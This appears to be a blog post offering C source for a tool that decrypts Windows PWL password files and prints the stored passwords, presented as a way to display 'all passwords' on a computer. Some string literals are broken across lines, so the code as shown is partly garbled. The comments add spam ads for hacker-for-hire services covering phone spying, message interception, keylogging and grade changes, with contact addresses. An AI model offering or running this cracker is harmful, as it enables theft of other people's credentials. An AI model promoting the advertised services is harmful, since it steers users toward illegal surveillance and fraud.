Get Computer using below code.
After you run the code, all passwords will be displayed..
Code :
# include<stdio.h>
# include<stdio.h>
# include<process.h>
# include<stdlib.h>
# include<ctype.h>
# include<conio.h>
# include<mem.h>
unsigned char huge Data[100001];
unsigned char keystream[1001];
int Rpoint[300];
void main(int argc,char *argv[]){
FILE *fd;
int i,j;
int size;
char ch;
char *name;
int cracked;
int sizemask;
int maxr;
int rsz;
int pos;
int Rall[300]; /* Resourse allocation table */
if(argc<2){
printf("usage: glide filename (username)");
exit(1);
}
/* Read PWL file */
fd=fopen(argv[1],"rb");
if(fd==NULL){
printf("can't open file %s",argv[1]);
exit(1);
}
size=0;
while(!feof(fd)){
Data[size++]=fgetc(fd);
}
size--;
fclose(fd);
/* Find Username */
name=argv[1];
if(argc>2)name=argv[2];
printf("Username:%s
",name);
/* Copy encrypted text into keystream */
cracked=size-0x0208;
if(cracked<0)cracked=0;
if(cracked>1000)cracked=1000;
memcpy(keystream,Data+0x208,cracked);
/* Generate 20 bytes of keystream */
for(i=0;i<20;i++){
ch=toupper(name[i]);
if(ch==0)break;
if(ch=='.')break;
keystream[i]^=ch;
};
cracked=20;
/* Find allocated resources */
sizemask=keystream[0]+(keystream[1]<<8);
printf("Sizemask:%04X
",sizemask);
for(i=0;i<256;i++){
if(Data[i]!=0xff){
Rall[Data[i]]++;
if(Data[i]>maxr)maxr=Data[i];
}
}
maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be
divisible by 16 */
/*Search after resources */
Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */
for(i=0;i<maxr;i++){
/* Find the size of current resourse */
pos=Rpoint[i];
rsz=Data[pos]+(Data[pos+1]<<8);
rsz^=sizemask;
printf("Analysing block with size:%04x (%d:%d)
",rsz,i,Rall[i]);
if((Rall[i]==0)&&(rsz!=0)){
printf("Unused resourse has nonzero size!!!
");
printf("If last line produed any:You may try to recover
");
printf("Press y to attempt the recovery
");
ch=getch();
if(ch!='y')exit(0);
rsz=2;
i=i-1;
}
pos=pos+rsz;
/* Resourse have a tedency to have the wrong size for some reason*/
/* Chech for correct size*/
if(i<maxr-1){
while(Data[pos+3]!=keystream[1]){
printf(":",Data[pos+3]);
pos=pos+2; /* Very rude may fail */
}
}
pos+=2; /* Include pointer in size */
Rpoint[i+1]=pos;
}
Rpoint[maxr]=size;
/* Insert Table data into keystream*/
for(i=0;i<=maxr;i++){
keystream[20+2*i]^=Rpoint[i] & 0x00ff;
keystream[21+2*i]^=(Rpoint[i]>>8) & 0x00ff;
}
cracked+=maxr*2+2;
printf("%d Bytes of ketstream recoverd
",cracked);
/* Decrypt resources */
for(i=0;i<maxr;i++){
rsz=Rpoint[i+1]-Rpoint[i];
if(rsz>cracked)rsz=cracked;
printf("Resource[%d](%d)
",i,rsz);
for(j=0;j<rsz;j++)
printf("%c",Data[Rpoint[i]+j]^keystream[j]);
printf("
");
}
exit(0);
}
8 comments:
this is good bro but problem is this that how to run this code and if the computer is locked the what to do ..........
please reply
Hi Friend plzz tell me who to put this code??and who to use this codes???
i was getting error man ..can u post the correct one...
where the code to run
iam using codeblock 16.01 and there is an error can fixed it plz
I’m probably not the only who’ll love to keep a tab on my loved ones; knowing what he does on his phone and PC as well as his social media activities. Well I met the only reliable hacker/private investigator ( Hackmarvel4@gmail.com) who handles such jobs with precision. Surprisingly, he offered me a 24-hours total refund if I find his services unsatisfactory but he delivered way more than I expected. I’ll gladly list a couple of services he offers:
Tracking GPS location – Call Recordings – Call Logs Retrieval – Incoming calls restriction – Remotely accessing SMS –Genuine Software cracking --Game hacking and cracking --Keylogging – Remote device control – Calendar Monitoring – Remote email spying –Internet Usage Monitoring —Message retrievals: whatsapp message retrieval, iTunes message retrieval, Facebook message retrieval, instagram, snapchat message and story retrieval, etc– Intercepting Instant Messages: Whatsapp Spy, Viber Spy, Facebook Spy, Skype Spy, Hangouts Spy — Result/Grades modification; University, high school, professional schools, etc– Phone and PC bugging —Ambient Recording: Live listen and record voice surrounding phones – USSD Control commands .I’m quite sure he’s into many more. You can’t underestimate what he can do for you. You might really wanna consider contacting him today. He’s definitely going to be of great help.
( Hackmarvel4@gmail.com)
In order to get a good and reliable hacker, it is advised you know first HOW TO HIRE A HACKER and how to know the hacker you should go for
hireverifiedhacker.wordpress.com
My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com
Post a Comment